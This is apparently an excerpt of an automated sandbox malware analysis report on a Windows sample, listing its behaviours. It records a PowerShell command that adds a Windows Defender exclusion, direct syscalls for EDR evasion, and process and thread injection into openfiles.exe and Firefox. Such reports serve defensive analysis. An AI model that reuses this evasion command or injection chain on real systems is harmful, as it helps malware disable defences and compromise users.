                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C8DAE mov eax, dword ptr fs:[00000030h]3_2_018C8DAE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C8DAE mov eax, dword ptr fs:[00000030h]3_2_018C8DAE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01836DA0 mov eax, dword ptr fs:[00000030h]3_2_01836DA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CDB1 mov ecx, dword ptr fs:[00000030h]3_2_0183CDB1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CDB1 mov eax, dword ptr fs:[00000030h]3_2_0183CDB1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183CDB1 mov eax, dword ptr fs:[00000030h]3_2_0183CDB1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF mov eax, dword ptr fs:[00000030h]3_2_01828DBF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF mov eax, dword ptr fs:[00000030h]3_2_01828DBF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"Jump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory written: C:\Users\user\Desktop\IETC-24017.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 7732Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: UFUUPGsATdE.exe, 00000006.00000000.1744026689.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, UFUUPGsATdE.exe, 00000006.00000002.4124546108.00000000017A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Users\user\Desktop\IETC-24017.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
